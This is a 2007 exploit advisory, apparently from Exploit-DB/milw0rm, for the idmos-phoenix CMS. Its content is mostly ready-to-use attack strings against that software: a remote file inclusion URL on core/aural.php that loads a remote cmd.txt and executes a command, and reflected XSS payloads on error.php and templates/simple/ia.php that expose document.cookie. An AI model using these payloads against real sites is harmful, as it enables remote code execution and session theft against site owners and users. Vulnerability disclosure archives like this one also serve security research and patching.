idmos-phoenix CMS - 'aural.php' Remote File Inclusion

EDB-ID:

4495




Platform:

PHP

Date:

2007-10-07


idmos-phoenix cms Remote File inclusion
 
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
 
RFI
core/aural.php?site_absolute_path=http://localhost/cmd.txt?&cmd=dir
 
Xss
error.php?err_msg=<script>alert(document.cookie);</script>
templates/simple/ia.php?content=<script>alert(document.cookie);</script>
# WwW.SoQoR.NeT

# milw0rm.com [2007-10-07]